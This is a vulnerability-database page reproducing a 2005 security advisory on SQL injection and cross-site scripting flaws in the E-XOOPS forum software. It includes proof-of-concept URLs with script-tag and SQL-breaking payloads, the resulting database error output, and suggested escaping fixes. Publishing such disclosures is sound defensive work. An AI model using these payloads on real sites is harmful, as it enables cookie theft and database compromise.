Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

dcrab-e-xoops.txt

🗓️ 28 Mar 2005 00:00:00Reported by Diabolic CrabType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Multiple SQL injection, and XSS vulnerabilities in Easy Community Management System Forum (E-XOOPS) - High severit

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Dcrab 's Security Advisory  
http://icis.digitalparadox.org/~dcrab  
http://www.hackerscenter.com/  
  
Severity: High  
Title: Multiple Sql injection, and multiple XSS vulnerabilities in Easy Community Management System Forum (E-XOOPS)  
Date: March 28, 2005  
  
Summary:  
There are multiple sql injection, xss vulnerabilities in the Easy Community Management System Forum (E-XOOPS)  
Vendor: E-Xoops  
Vendor website: www.exoops.info  
  
Proof of Concept Exploits:  
  
http://localhost/modules/newbb/viewforum.php?sortname=p.post_time&sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&forum=25&refresh=Vai  
Pops cookie  
  
  
http://localhost/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/modules/newbb/index.php?viewcat='SQL_INJECTION  
SQL ERROR AND POSSIBLE INJECTION  
Error  
  
SELECT f.*, u.uname, u.uid, p.topic_id, p.post_time, p.subject, p.icon FROM e_xoops_bb_forums f LEFT JOIN e_xoops_bb_posts p ON p.post_id = f.forum_last_post_id LEFT JOIN e_xoops_users u ON u.uid = p.uid WHERE f.cat_id = \'SQL_INJECTION ORDER BY f.cat_id, f.forum_name  
  
  
http://localhost/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9  
SQL ERROR AND POSSIBLE INJECTION  
  
Errore Numero: 2 [Attenzione]  
Message errore: mysql_fetch_row(): supplied argument is not a valid MySQL result resource  
In File: /var/www/*************/09/class/database/mysql.php  
On Line: 151  
  
Errore Numero: 2 [Attenzione]  
Message errore: mysql_fetch_row(): supplied argument is not a valid MySQL result resource  
In File: /var/www/*************/09/class/database/mysql.php  
On Line: 151   
  
  
Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.  
  
Author:  
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure coding with php.  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
e-xoopssql injectionxssvulnerabilitiessecurity advisoryeasy community management systemdiabolic crabhackerscenter
24
.json
Report